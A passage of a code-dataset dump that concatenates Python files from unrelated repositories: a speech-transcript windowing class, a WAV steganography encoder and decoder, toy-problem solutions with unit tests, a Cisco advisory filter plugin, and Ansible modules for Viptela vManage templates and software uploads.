self.getIUs(subset=subset,textlist=text,at=maxIU)])
if window == {}:
end = True
else:
output[i] = window
i+=1
point += shift
elif outputunit == 'turn':
i = 1
end = False
if castunit == 's':
while end == False:
minturn = point - size
maxturn = point + size - minus
window = self.combineSubsets([self.getTurns(subset=subset,textlist=text,after=minturn,before=maxturn),
self.getTurns(subset=subset,textlist=text,at=minturn),
self.getTurns(subset=subset,textlist=text,at=maxturn)])
if window == {}:
end = True
else:
output[i] = window
i+=1
point += shift
return [output[window] for window in output if output[window] != {}]
def printSubset(self, subset, title=True, tier='dt', timestamps=True, labels=True, numberedlines=False, decimal=3):
output = ''
for text in subset:
output += '\n'
header = subset[text]['name']+' ('
turns = [t for t in list(subset[text]) if (type(t) == int)]
turns.sort()
turn1 = min(turns)
IUlist = [iu for iu in list(subset[text][turn1]) if (type(iu) == int)]
IUlist.sort()
IU1 = min(IUlist)
lstturn = max(turns)
IUlist = [iu for iu in list(subset[text][lstturn]) if (type(iu) == int)]
lstIU = max(IUlist)
header += self.format_time(subset[text][turn1][IU1]['start'], decimal) + ' - ' + self.format_time(subset[text][lstturn][lstIU]['end'], decimal) + ')\n'
if title == True:
output += header
for turn in turns:
IUlist = [i for i in subset[text][turn] if (type(i) == int)]
IUlist.sort()
label = subset[text][turn]['ID']
if label == 0:
label = 'OTHER'
else:
label = self.getParticipants('ID='+str(label),'NAME')[-1]
IU1 = min(IUlist)
turn_start = self.format_time(subset[text][turn][IU1]['start'], decimal)
turn_end = self.format_time(subset[text][turn][IU1]['end'], decimal)
if numberedlines == True:
output += str(IU1)+'\t'
if timestamps == True:
output += turn_start + '\t' + turn_end + '\t'
if labels == True:
output += label + ';\t'
IUtext = []
words = [wd for wd in list(subset[text][turn][IU1]) if (type(wd) == int)]
words.sort()
for word in words:
IUtext += [subset[text][turn][IU1][word][tier]]
output += ' '.join(IUtext) + '\n'
if len(IUlist) > 1:
for IU in IUlist[1:]:
IUtext = []
turn_start = self.format_time(subset[text][turn][IU]['start'], decimal)
turn_end = self.format_time(subset[text][turn][IU]['end'], decimal)
if numberedlines == True:
output += str(IU)+'\t'
if timestamps == True:
output += turn_start + '\t' + turn_end + '\t'
if labels == True:
output += '\t'
IUtext = []
words = [wd for wd in list(subset[text][turn][IU]) if (type(wd) == int)]
words.sort()
for word in words:
IUtext += [subset[text][turn][IU][word][tier]]
for word in IUtext:
pass
output += ' '.join(IUtext) + '\n'
print(output)
def listWords(self, words='all', tier='dt', IUs=True):
wordlist=[]
IUlist=[]
if words == 'all':
words == getTexts()
prevIU = int
for text,turn,IU,word in self.generator(words,'word'):
if IUs == True:
if prevIU != IU:
if prevIU != int:
wordlist += [[IUlist]]
IUlist = []
IUlist += [words[text][turn][IU][word][tier]]
prevIU = IU
else:
wordlist += [words[text][turn][IU][word][tier]]
if IUlist != []:
wordlist += IUlist
return wordlist
``` |
{
"source": "JohnWebb4/steganography",
"score": 3
} |
#### File: JohnWebb4/steganography/steg_wav.py
```python
import numpy as np
import os
import soundfile as sf # Read/Write sound
import time # write time
buffer_size = 1024 # buffer size
byte_max = 255 # max value of byte
fft_first_value = -45 # first value of fft
message_ext = ".wav" # encoding file type
noise_fft_scale = 2 # amplitude of noise
progress_every = 10 # write progress every x %
sample_rate = 44100 # sampling rate
def compare():
"""
Compare bytes of file
:return: None
"""
filename_1 = input("Enter the first filename: ") # get filename
filename_2 = input("Enter the second filename: ") # get filename
n_correct = 0 # number of correct
file_1_size = os.path.getsize(filename_1) # get file 1 size
with open(filename_1, "rb") as file_1: # open file 1
with open(filename_2, "rb") as file_2: # open file 2
while True: # till eof
buffer_1 = file_1.read(buffer_size) # read buffer
buffer_2 = file_2.read(buffer_size) # read buffer
if buffer_1 and buffer_2: # if read values
int_buff_1 = [b for b in buffer_1] # get integer values
int_buff_2 = [b for b in buffer_2] # get integer values
n_correct += np.sum(np.equal(int_buff_1, int_buff_2)) # increment number of identical values
else: # no buffer
break # end comparison
# Write results
print("{0} is {1}% or {2} bytes different from {3}".format(filename_2,
100 - n_correct / file_1_size * 100,
file_1_size - n_correct,
filename_1)) # write results
def decode():
"""
Decode message
:return: None
"""
filename = input("Enter the file to decode: ") # get filename
out_filename = os.path.splitext(filename)[0] # get file without extension
sound, sample = sf.read(filename) # read sound file
len_sound = len(sound) # get length of sound file
buffer_sound_size = buffer_size + 2 # calculate sound buffer size
with open(out_filename, "wb") as f: # open output file
position = 0 # position in file
prev_percent_progress = 0 # position of last writing progress
prev_time = time.time() # get time
while position < len_sound: # cycle through sound file
sound_data = sound[position:position+buffer_sound_size] # read buffer
valid_freq = np.fft.fft(sound_data)[1:int(len(sound_data) / 2)] # validate frequency
real_valid_freq = np.real(valid_freq) # get real values
imag_valid_freq = np.imag(valid_freq) # get imaginary values
scale_valid_freq = np.concatenate((real_valid_freq, imag_valid_freq), axis=0) # concatenate
if len(sound_data) != buffer_sound_size: # if last buffer
scale_valid_freq = scale_valid_freq[:-1] # slice last element
buffer = bytearray(np.array(np.round(scale_valid_freq * byte_max / noise_fft_scale),
dtype=np.int8)) # validate conversion
if buffer: # if read data
f.write(buffer) # write buffer
# Update position
percent_progress = position / len_sound * 100 # get progress as %
if percent_progress - prev_percent_progress >= progress_every: # if need to write progress
print("{0}% complete in {1} seconds.".format(percent_progress,
time.time() - prev_time)) # write progress
prev_percent_progress = percent_progress # update previous position
position += len(sound_data) # increment position
else: # if no data
break # end file
print("Done decoding {0} to {1}".format(filename, out_filename)) # write done
def encode():
"""
Encode message
:return: None
"""
filename = input("Enter the file to encode: ") # get filename
file_size = os.path.getsize(filename) # get file size
out_filename = filename + message_ext # get output filename
sound = [] # declare sound
position = 0 # position in file
prev_percent_progress = 0 # previous position for writing progress
prev_time = time.time() # get current time
with open(filename, "rb") as f: # open file
n_correct = 0 # number of lossless conversions
while True: # till eof
buffer = f.read(buffer_size) # read buffer
if buffer: # if can read
float_buffer = np.array([float(b) for b in buffer]) # write buffer to floats
if len(float_buffer) % 2 != 0: # if odd
float_buffer = np.concatenate((float_buffer, [0]), axis=0) # pad -1
real_buff, imag_buff = np.split(float_buffer / byte_max * noise_fft_scale, 2) # split buffer
fft_data = [complex(i, j) for i, j in zip(real_buff, imag_buff)] # compress
fft_data = [complex(fft_first_value, 0)] + fft_data + [complex(0, 0)]
back_buffer = np.flip(np.conj(fft_data[1:-1]), axis=0) # slice buffer back
fft_data.extend(back_buffer) # concatenate
sound_data = np.real(np.fft.ifft(fft_data)) # get real part
# Validate
valid_freq = np.fft.fft(sound_data)[1:int(len(sound_data) / 2)] # validate frequency
real_valid_freq = np.real(valid_freq) # get real values
imag_valid_freq = np.imag(valid_freq) # get imaginary values
scale_valid_freq = np.concatenate((real_valid_freq, imag_valid_freq), axis=0) # concatenate
valid_buffer = np.round(scale_valid_freq * byte_max / noise_fft_scale) # validate conversion
n_correct += np.sum(np.equal(float_buffer, valid_buffer)) # validate data
sound.extend(sound_data) # extend sound file
# update position
percent_progress = position / file_size * 100 # convert progress to percent
if percent_progress - prev_percent_progress >= progress_every: # if need to write progress
print("{0}% done in {1} seconds.".format(percent_progress,
time.time() - prev_time)) # write progress
prev_percent_progress = percent_progress # update previous position
position += len(buffer) # increment position
else: # if can't read
break # end encoding
print("{0}% of {1} lossless conversion.".format(n_correct / file_size * 100, file_size)) # write results
sf.write(out_filename, sound, sample_rate) # write sound file
def main():
"""
Main script program
:return: None
"""
is_exit = False # should exit
print_help() # print help
while not is_exit: # while should not exit
command = input("Enter a command: ").lower() # get command
if command == "exit":
is_exit = True # should exit
elif command == "compare": # if compare
compare() # call compare
elif command == "decode": # if decode
decode() # call decode
elif command == "encode": # if encode
encode() # call encode
def print_help():
"""
Write help to console
:return: None
"""
print("Type 'Compare' to compare bytes.") # write compare
print("Type 'Decode' to decode a message.") # write decode
print("Type 'Encode' to write a message.") # write encode
print("Type 'Exit' to close.") # write exit
if __name__ == "__main__": # if running script
main() # call main
``` |
{
"source": "JohnWebb4/toy-problems",
"score": 4
} |
#### File: src/containerOfBalls/containerOfBalls.py
```python
from copy import deepcopy
# Input container: array of array of ints. Number of each ball type in each container
# Output: 'Possible' or 'Impossible' to swap balls and sort
# Side Effects: None
# Create map storing count of each type of ball
# Create map storing number of balls in each container
# For each type
# # Find container with same number of balls
# # # If exists remove from list
# # # If not return 'Impossible'
# Compare num remainding containers
# # If none return 'Possible'
# # Else return 'Impossible'
def organize_containers(container: [[int]]):
num_containers = len(container)
if num_containers == 0:
return 'Possible'
num_types = len(container[0])
if num_types == 0:
return 'Possible'
if num_containers != num_types:
return 'Impossible'
type_count_map = container[0]
box_count_map = [sum(box) for box in container]
for i in range(1, num_containers):
for j in range(len(container[i])): # Possible jagged array
type_count_map[j] += container[i][j]
sorted_type_counts = sorted(type_count_map)
sorted_box_counts = sorted(box_count_map)
return 'Possible' if sorted_type_counts == sorted_box_counts else 'Impossible'
``` |
{
"source": "JohnWebb4/toy_problems",
"score": 3
} |
#### File: src/ransomNote/ransomNote.py
```python
def check_magazine(magazine, note):
result = True
magazine_hash = {}
note_hash = {}
# Create magazine hash table
for magazine_word in magazine:
magazine_hash[magazine_word] = magazine_hash.get(magazine_word, 0) + 1
# Create note hash table
for note_word in note:
note_hash[note_word] = note_hash.get(note_word, 0) + 1
for note_word in note_hash:
if magazine_hash.get(note_word, 0) < note_hash[note_word]:
result = False
break
return "Yes" if result else "No"
``` |
{
"source": "JohnWebb4/toy-problems",
"score": 3
} |
#### File: src/ransomNote/ransomNoteTests.py
```python
import unittest
from src.ransomNote.ransomNote import check_magazine
class TestRansomNote(unittest.TestCase):
def test_missing_word(self):
self.assertEqual(check_magazine(["Give", "me", "the"], ["Give", "me", "the", "money"]), "No")
def test_give_money_with_everything(self):
self.assertEqual(check_magazine(["Give", "me", "the", "money"], ["Give", "me", "the", "money"]), "Yes")
``` |
{
"source": "JohnWebb4/toy_problems",
"score": 3
} |
#### File: src/removeDuplicates/removeDuplicatesTests.py
```python
import unittest
from src.removeDuplicates.removeDuplicates import remove_duplicates
class TestRemoveDuplicates(unittest.TestCase):
def test_remove_duplicates_5(self):
nums = [0,0,1,1,1,2,2,3,3,4]
self.assertEqual(5, remove_duplicates(nums))
self.assertEqual([0,1,2,3,4], nums)
def test_remove_duplicates_2(self):
nums = [1,1,2]
self.assertEqual(2, remove_duplicates(nums))
self.assertEqual([1,2], nums)
``` |
{
"source": "JohnWebb4/toy-problems",
"score": 4
} |
#### File: src/reverseInteger/reverseInteger.py
```python
def reverse_integer(num):
str_num = str(num).replace('-', '')[::-1]
if num < 0:
str_num = '-' + str_num
rev_num = int(str_num)
if rev_num > 2147483647:
return 0
if rev_num < -2147483648:
return 0
return rev_num
```
#### File: src/shortestPathMatrix/shortestPathMatrix.py
```python
from queue import PriorityQueue
def shortestPathBinaryMatrix(grid) -> int:
size = -1
queue = PriorityQueue()
len_grid_height = len(grid)
len_grid_width = len(grid[0])
if grid[0][0] == 1:
return -1
has_seen = {'0,0': True}
queue.put([len_grid_height + len_grid_width, 1, [0, 0]])
while not queue.empty():
next = queue.get()
current_length = next[1]
current_pos = next[2]
if current_pos[0] >= len(grid) - 1 and current_pos[1] >= len(grid[current_pos[0]]) - 1:
size = current_length
break
to_add = []
if current_pos[0] + 1 < len(grid):
new_pos = [current_pos[0] + 1, current_pos[1]]
to_add.append(new_pos)
if current_pos[1] + 1 < len(grid[current_pos[0]]):
new_pos = [current_pos[0], current_pos[1] + 1]
to_add.append(new_pos)
if current_pos[0] + 1 < len(grid) and current_pos[1] + 1 < len(grid[current_pos[0]]):
new_pos = [current_pos[0] + 1, current_pos[1] + 1]
to_add.append(new_pos)
if current_pos[0] - 1 >= 0 and current_pos[1] + 1 < len(grid[current_pos[0]]):
new_pos = [current_pos[0] - 1, current_pos[1] + 1]
to_add.append(new_pos)
if current_pos[0] + 1 < len(grid) and current_pos[1] - 1 >= 0:
new_pos = [current_pos[0] + 1, current_pos[1] - 1]
to_add.append(new_pos)
if current_pos[0] - 1 >= 0:
new_pos = [current_pos[0] - 1, current_pos[1]]
to_add.append(new_pos)
if current_pos[1] - 1 >= 0:
new_pos = [current_pos[0], current_pos[1] - 1]
to_add.append(new_pos)
if current_pos[0] - 1 >= 0 and current_pos[1] - 1 >= 0:
new_pos = [current_pos[0] - 1, current_pos[1] - 1]
to_add.append(new_pos)
for new_pos in to_add:
key = ','.join(str(e) for e in new_pos)
if grid[new_pos[0]][new_pos[1]] == 0 and not has_seen.get(key):
new_length = current_length + 1
new_cost = len_grid_height - new_pos[0] + len_grid_width - new_pos[1] + new_length
with queue.mutex:
# API not guaranteed
is_in_queue = False
for e in queue.queue:
# If I can get to this position faster
if e[2] == new_pos:
if new_length < e[1]:
e[0] = new_cost
e[1] = new_length
is_in_queue = True
break
if not is_in_queue:
queue.put([new_cost, new_length, new_pos])
has_seen[key] = True
return size
```
#### File: src/specialMultiple/specialMultiple.py
```python
def increment(digits):
for i in reversed(range(len(digits))):
digit = digits[i]
if digit == '0':
digits[i] = '9'
break
elif digit == '9' and i != 0:
digits[i] = '0'
continue
elif digit == '9' and i == 0:
# Add another digit and reset
digits.append('0')
digits[0] = '9'
for j in range(len(digits) - 1):
digits[j + 1] = '0'
break
return digits
def special_multiple(x):
if x == 0:
return 0
digits = ['9']
value = 9
while value % x != 0:
value = int(''.join(digits))
digits = increment(digits)
return str(value)
``` |
{
"source": "johnwelby1965/openvuln",
"score": 3
} |
#### File: openvuln/filter_plugins/custom_filter.py
```python
class FilterModule(object):
def filters(self):
return {
'custom_adv_filter': self.custom_adv_filter,
'custom_net_os_filter': self.custom_net_os_filter,
}
def custom_net_os_filter(self, input_var):
net_os = input_var[0]
net_version = input_var[1]
net_version_major = net_version.split('.')[0]
if net_os == 'nxos':
output_var = 'nxos ' + net_version
elif net_os == 'ios' and net_version_major in ['12', '15']:
output_var = 'ios ' + net_version
elif net_os == 'ios' and net_version_major in ['03', '16', '17']:
output_var = 'iosxe ' + net_version
return output_var
def custom_adv_filter(self, input_var):
output_var = []
for os_loop in input_var:
print(os_loop['item']['os'])
if (os_loop['json'].get('advisories')):
for adv_loop in os_loop['json']['advisories']:
# catch two possible data structures with first fixed releases
fixed = []
if (adv_loop.get('firstFixed')):
fixed = adv_loop['firstFixed']
else:
fixed = adv_loop['platforms'][0]['firstFixes'][0]['name']
# catch cvss score string that contains no number
try:
cvss_float = float(adv_loop['cvssBaseScore'])
except ValueError:
cvss_float = 0.0
output_var.append({ 'os': os_loop['item']['os'],
'id': adv_loop['advisoryId'],
'sir': adv_loop['sir'],
'cvss': cvss_float,
'cve': adv_loop.get('cves', []),
'url': adv_loop['publicationUrl'],
'fixed': fixed
})
return output_var
``` |
{
"source": "johnwelby1965/viptela",
"score": 2
} |
#### File: viptela/library/vmanage_feature_template.py
```python
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
from ansible.module_utils.basic import AnsibleModule, json
from ansible.module_utils.viptela import viptelaModule, viptela_argument_spec
from collections import OrderedDict
def run_module():
# define available arguments/parameters a user can pass to the module
argument_spec = viptela_argument_spec()
argument_spec.update(state=dict(type='str', choices=['absent', 'present'], default='present'),
name=dict(type='str', alias='templateName'),
description=dict(type='str', alias='templateDescription'),
definition=dict(type='dict', alias='templateDefinition'),
template_type=dict(type='str', alias='templateType'),
device_type=dict(type='list', alias='deviceType'),
template_min_version=dict(type='str', alias='templateMinVersion'),
factory_default=dict(type='bool', alias='factoryDefault'),
url=dict(type='bool', alias='templateUrl'),
aggregate=dict(type='list'),
)
# seed the result dict in the object
# we primarily care about changed and state
# change is if this module effectively modified the target
# state will include any data that you want your module to pass back
# for consumption, for example, in a subsequent task
result = dict(
changed=False,
)
# the AnsibleModule object will be our abstraction working with Ansible
# this includes instantiation, a couple of common attr would be the
# args/params passed to the execution, as well as if the module
# supports check mode
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True,
)
viptela = viptelaModule(module)
# Always as an aggregate... make a list if just given a single entry
if viptela.params['aggregate']:
feature_template_list = viptela.params['aggregate']
else:
if viptela.params['state'] == 'present':
try:
feature_template_list = [
{
'templateName': viptela.params['name'],
'templateDescription': viptela.params['description'],
'deviceType': viptela.params['device_type'],
'templateDefinition': viptela.params['definition'],
'templateType': viptela.params['template_type'],
'templateMinVersion': viptela.params['template_min_version'],
'factoryDefault': viptela.params['factory_default']
}
]
except:
module.fail_json(
msg="Required values: name, description, device_type, definition, template_type, template_min_version, factory_default")
else:
try:
feature_template_list = [
{
'templateName': viptela.params['name']
}
]
except:
module.fail_json(
msg='Required values: name'
)
feature_template_dict = viptela.get_feature_template_dict(factory_default=True, remove_key=False)
ignore_values = ["lastUpdatedOn", "lastUpdatedBy", "templateId", "createdOn", "createdBy"]
compare_values = ['templateDescription', 'deviceType', 'templateType', 'templateDefinition', 'templateMinVersion']
for feature_template in feature_template_list:
if viptela.params['state'] == 'present':
payload = {
'templateName': feature_template['templateName'],
'templateDescription': feature_template['templateDescription'],
'deviceType': feature_template['deviceType'],
'templateType': feature_template['templateType'],
'templateMinVersion': feature_template['templateMinVersion'],
'factoryDefault': feature_template['factoryDefault'],
'templateDefinition': feature_template['templateDefinition']
}
# FIXME (Issue #1): This is a temporary workaround for the fact that vManage requires it payload in a specific order
template_definition = OrderedDict()
if 'if-name' in feature_template['templateDefinition']:
template_definition['if-name'] = feature_template['templateDefinition'].pop('if-name')
if 'vpn-id' in feature_template['templateDefinition']:
template_definition['vpn-id'] = feature_template['templateDefinition'].pop('vpn-id')
for key, value in feature_template['templateDefinition'].items():
template_definition[key] = value
payload['templateDefinition'] = template_definition
if payload['templateName'] in feature_template_dict:
viptela.result['changed'] = False
# changed_items = viptela.compare_payloads(payload, feature_template_dict[payload['templateName']], compare_values=compare_values)
# if changed_items:
# viptela.result['changed'] = True
# viptela.result['what_changed'] = changed_items
# if not module.check_mode:
# viptela.request('/dataservice/template/feature/{0}'.format(feature_template_dict[payload['templateName']]['templateId']),
# method='PUT', payload=payload)
else:
if not module.check_mode:
viptela.request('/dataservice/template/feature/', method='POST', payload=payload)
viptela.result['changed'] = True
else:
if feature_template['templateName'] in feature_template_dict:
if not module.check_mode:
viptela.request('/dataservice/template/feature/{0}'.format(
feature_template_dict[feature_template['templateName']]['templateId']),
method='DELETE')
viptela.result['changed'] = True
viptela.exit_json(**viptela.result)
def main():
run_module()
if __name__ == '__main__':
main()
```
#### File: viptela/library/vmanage_policy_list_facts.py
```python
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
import requests
from ansible.module_utils.basic import AnsibleModule, json
from ansible.module_utils.viptela import viptelaModule, viptela_argument_spec
def run_module():
# define available arguments/parameters a user can pass to the module
argument_spec = viptela_argument_spec()
# seed the result dict in the object
# we primarily care about changed and state
# change is if this module effectively modified the target
# state will include any data that you want your module to pass back
# for consumption, for example, in a subsequent task
result = dict(
changed=False,
)
# the AnsibleModule object will be our abstraction working with Ansible
# this includes instantiation, a couple of common attr would be the
# args/params passed to the execution, as well as if the module
# supports check mode
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True,
)
viptela = viptelaModule(module)
# vSmart policies
# response = viptela.request('/dataservice/template/policy/vsmart')
# response_json = response.json()
# vsmart_policies = response_json['data']
policy_lists = {}
# for list_type in viptela.POLICY_LIST_TYPES:
# list = viptela.get_policy_list_list(list_type)
# policy_lists[list_type] = list
policy_lists = viptela.get_policy_list_list('all')
# # Prefix lists
# prefix_lists = viptela.get_policy_list_list('prefix')
#
# # VPN lists
# vpn_lists = viptela.get_policy_list_list('vpn')
#
# policy_lists = {
# # 'vsmart_policies': vsmart_policies,
# 'vmanage_site_lists': site_lists,
# 'vmanage_prefix_lists': prefix_lists,
# 'vmanage_vpn_lists': vpn_lists,
# }
viptela.result['policy_lists'] = policy_lists
viptela.exit_json(**viptela.result)
def main():
run_module()
if __name__ == '__main__':
main()
```
#### File: viptela/library/vmanage_software_upload.py
```python
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
#### CAN WE DO THIS ????
import os
from ansible.module_utils.basic import AnsibleModule, json
from ansible.module_utils.viptela import viptelaModule, viptela_argument_spec
from collections import OrderedDict
def run_module():
# define available arguments/parameters a user can pass to the module
argument_spec = viptela_argument_spec()
argument_spec.update(state=dict(type='str', choices=['absent', 'present'], default='present'),
file=dict(type='str'),
aggregate=dict(type='list')
)
# seed the result dict in the object
# we primarily care about changed and state
# change is if this module effectively modified the target
# state will include any data that you want your module to pass back
# for consumption, for example, in a subsequent task
result = dict(
changed=False,
)
# the AnsibleModule object will be our abstraction working with Ansible
# this includes instantiation, a couple of common attr would be the
# args/params passed to the execution, as well as if the module
# supports check mode
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True,
)
viptela = viptelaModule(module)
if viptela.params['aggregate']:
upload_software_list = viptela.params['aggregate']
else:
upload_software_list = [
{
'file': module.params['file']
}
]
# THIS MODULE IS DESIGNED TO UPLOAD UPGRADE IMAGES TO THE VMANAGE
# Software in SD-WAN varies depending on what you want to upgrade.
# This is a complication for what concern idempotency of this module
# Files to upgrade vmanage will look like: vmanage-XX.YY.ZZ-<platform>.tar.gz
# Files to upgrade vedge cloud/vedge 5k/vbond/vsmart will look like: viptela-XX.YY.ZZ-<platform>.tar.gz
# Physical appliances will NOT have incremental upgrade images
# CISCO Physical appliances will be upgraded via a new .bin file
# VIPTELA Physical appliances will be upgraded via a new .tar.gz file
viptela.result['changed'] = False
vManage_software_list = viptela.get_software_images_list()
if viptela.params['state'] == 'present':
for software_to_upload in upload_software_list:
try:
present = False
path_software_to_be_uploaded = software_to_upload['file']
if not os.path.exists(path_software_to_be_uploaded):
module.fail_json(
msg="File does not exists")
filename_software_to_be_uploaded = os.path.basename(path_software_to_be_uploaded)
for software in vManage_software_list:
availabe_files_list = software["availableFiles"].split(', ')
if filename_software_to_be_uploaded in availabe_files_list:
present = True
if not module.check_mode and not present:
response = viptela.request('/dataservice/device/action/software/package', method='POST',
files={'file': open(path_software_to_be_uploaded, 'rb')},
data={'validity':'valid', 'upload':'true'},
headers=None)
viptela.result['changed'] = True
except Exception as e:
module.fail_json(
msg="General Error {0}".format(e))
else:
# absent to be added
pass
viptela.exit_json(**viptela.result)
def main():
run_module()
if __name__ == '__main__':
main()
``` |
{
"source": "johnwen84/my-php-buildpack",
"score": 2
} |
#### File: lib/php/extension.py
```python
import os
import string
import json
import glob
from build_pack_utils import utils
from compile_helpers import convert_php_extensions
from compile_helpers import is_web_app
from compile_helpers import find_stand_alone_app_to_run
from compile_helpers import load_manifest
from compile_helpers import find_all_php_versions
from compile_helpers import validate_php_version
from compile_helpers import validate_php_extensions
from compile_helpers import validate_php_ini_extensions
from compile_helpers import include_fpm_d_confs
from extension_helpers import ExtensionHelper
def find_composer_paths(ctx):
build_dir = ctx['BUILD_DIR']
webdir = ctx['WEBDIR']
json_path = None
lock_path = None
json_paths = [
os.path.join(build_dir, 'composer.json'),
os.path.join(build_dir, webdir, 'composer.json')
]
lock_paths = [
os.path.join(build_dir, 'composer.lock'),
os.path.join(build_dir, webdir, 'composer.lock')
]
env_path = os.getenv('COMPOSER_PATH')
if env_path is not None:
json_paths = json_paths + [
os.path.join(build_dir, env_path, 'composer.json'),
os.path.join(build_dir, webdir, env_path, 'composer.json')
]
lock_paths = lock_paths + [
os.path.join(build_dir, env_path, 'composer.lock'),
os.path.join(build_dir, webdir, env_path, 'composer.lock')
]
for path in json_paths:
if os.path.exists(path):
json_path = path
for path in lock_paths:
if os.path.exists(path):
lock_path = path
return (json_path, lock_path)
class PHPExtension(ExtensionHelper):
def _should_compile(self):
return self._ctx['PHP_VM'] == 'php'
def _configure(self):
manifest = load_manifest(self._ctx)
dependencies = manifest['dependencies']
self._ctx['ALL_PHP_VERSIONS'] = find_all_php_versions(dependencies)
def _preprocess_commands(self):
return (('$HOME/.bp/bin/rewrite', '"$HOME/php/etc"'),)
def _service_commands(self):
if is_web_app(self._ctx):
return {
'php-fpm': (
'$HOME/php/sbin/php-fpm',
'-p "$HOME/php/etc"',
'-y "$HOME/php/etc/php-fpm.conf"',
'-c "$HOME/php/etc"')
}
else:
app = find_stand_alone_app_to_run(self._ctx)
return {
'php-app': (
'$HOME/php/bin/php',
'-c "$HOME/php/etc"',
app)
}
def _service_environment(self):
env = {
'LD_LIBRARY_PATH': '$LD_LIBRARY_PATH:$HOME/php/lib',
'PATH': '$PATH:$HOME/php/bin:$HOME/php/sbin',
'PHPRC': '$HOME/php/etc'
}
if 'snmp' in self._ctx['PHP_EXTENSIONS']:
env['MIBDIRS'] = '$HOME/php/mibs'
php_ini_d_path = os.path.join(self._ctx['BUILD_DIR'], 'php', 'etc', 'php.ini.d')
if os.path.exists(php_ini_d_path):
env['PHP_INI_SCAN_DIR'] = '$HOME/php/etc/php.ini.d/'
return env
def _compile(self, install):
ctx = install.builder._ctx
(composer_json_file, composer_lock_file) = find_composer_paths(ctx)
options_json_file = os.path.join(ctx['BUILD_DIR'],'.bp-config', 'options.json')
if (os.path.isfile(options_json_file) and composer_json_file and os.path.isfile(composer_json_file)):
# options.json and composer.json both exist. Check to see if both define a PHP version.
composer_json = json.load(open(composer_json_file,'r'))
options_json = json.load(open(options_json_file,'r'))
if composer_json.get('require', {}).get('php') and options_json.get("PHP_VERSION"):
print('WARNING: A version of PHP has been specified in both `composer.json` and `./bp-config/options.json`.')
print('WARNING: The version defined in `composer.json` will be used.')
if ctx.get('OPTIONS_JSON_HAS_PHP_EXTENSIONS', False):
print("Warning: PHP_EXTENSIONS in options.json is deprecated. See: http://docs.cloudfoundry.org/buildpacks/php/gsg-php-config.html")
print 'Installing PHP'
validate_php_version(ctx)
print 'PHP %s' % (ctx['PHP_VERSION'])
major_minor = '.'.join(string.split(ctx['PHP_VERSION'], '.')[0:2])
(install
.package('PHP')
.done())
validate_php_ini_extensions(ctx)
validate_php_extensions(ctx)
convert_php_extensions(ctx)
include_fpm_d_confs(ctx)
(install
.config()
.from_application('.bp-config/php') # noqa
.or_from_build_pack('defaults/config/php/%s.x' % major_minor)
.to('php/etc')
.rewrite()
.done())
return 0
# Register extension methods
PHPExtension.register(__name__)
``` |
{
"source": "JohnWes7/Auto-AzurLane",
"score": 3
} |
#### File: Auto-AzurLane/bin/screenshots.py
```python
import os
if __name__ == '__main__':
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from src.adb import Adb
from src.path import Path
from src.config import Config
def run():
a = Adb(adbpath=Path.get_adb_path(),screenshots_dir=Path.get_screenshots_dir(),hostport=Config.get_hostport())
a.check()
a.screenshots()
print(f'截图已保存 {a.get_screenshots_path()}')
if __name__ == '__main__':
run()
```
#### File: Auto-AzurLane/src/config.py
```python
import configparser
from src.path import Path
class Config:
__ini = None
@classmethod
def __getconfig(cls):
if cls.__ini:
print('aaa')
return cls.__ini
cls.__ini = configparser.ConfigParser()
cls.__ini.read(Path.get_configini_path(), encoding='utf-8')
return cls.__ini
@classmethod
def get_hostport(cls):
return cls.__getconfig().get('general', 'hostport')
``` |
{
"source": "johnwesleyharding/DSsprint9Sleepless",
"score": 3
} |
#### File: Sleepless/modules/test.py
```python
from whatever import addition
import unittest
class FunctTester(unittest.TestCase):
"""
nope
"""
def test_addition(self):
try:
self.assertEqual(addition(1, 1), 10)
except:
pass
def test_zebisnotatl(self):
pass
if __name__ == '__main__':
unittest.main()
```
#### File: Sleepless/modules/weather_test.py
```python
import unittest
class TempTrack:
""" TemperatureTracker """
def __init__(self):
#nessary?
self.temps = [0] * 140
self.num_temps = 0
self.min = 140
self.max = -1
self.total = 0
self.mean = None
self.max_freq = 0
self.mode = None
def insert(self, temp):
if temp < 0 or temp > 140:
raise Exception
self.temps[temp] += 1
self.num_temps += 1
if temp < self.min:
self.min = temp
if temp > self.max:
self.max = temp
self.total += temp
self.mean = self.total / float(self.num_temps)
if self.temps[temp] > self.max_freq:
self.max_freq = self.temps[temp]
self.mode = temp
def get_max(self):
max =self.max
if max == -1:
max = None
return max
def get_min(self):
min = self.min
if min == 140:
min = None
return min
def get_mean(self):
return self.mean
def get_mode(self):
return self.mode
class TestTempTracker(unittest.TestCase):
def _test_tracker(self, temps, min, max, mean, modes):
tracker = TempTrack()
for temp in temps:
tracker.insert(temp)
print("")
print("Test: temps = %s" % temps)
print(" min %s max %s" % (tracker.get_min(), tracker.get_max()))
#self.assertTrue(tracker.get_min() == min)
self.assertTrue(tracker.get_max() == max)
print(" mean %s mode %s" % (tracker.get_mean(), tracker.get_mode()))
self.assertTrue(tracker.get_mean() == mean)
self.assertTrue(tracker.get_mode() in modes)
def test_null(self):
self._test_tracker([], None, None, None, [None])
def test_0(self):
self._test_tracker([0], 0, 0, 0, [0])
def test_01(self):
self._test_tracker([0, 1], 0, 1, 0.5, [0, 1])
def test_011(self):
self._test_tracker([0, 1, 1], 0, 1, 2 / 3.0, [1])
def test_0112(self):
self._test_tracker([0, 1, 1, 2], 0, 2, 4 / 4.0, [1])
def test_0111225(self):
self._test_tracker([0, 1, 1, 2, 2, 5], 0, 5, 11 / 6.0, [1, 2])
def test_011122555(self):
self._test_tracker([0, 1, 1, 2, 2, 5, 5, 5], 0, 5, 21 / 8.0, [5])
def test_extremes(self):
tracker = TempTrack()
self.assertRaises(Exception, tracker.insert, -1)
#self.assertRaises(Exception, tracker.insert, 111)
if __name__ == "__main__":
# unittest.main()
suite = unittest.TestLoader().loadTestsFromTestCase(TestTempTracker)
unittest.TextTestRunner(verbosity=2).run(suite)
``` |
{
"source": "johnwesleyharding/DS-Unit-3-Sprint-2-SQL-and-Databases",
"score": 4
} |
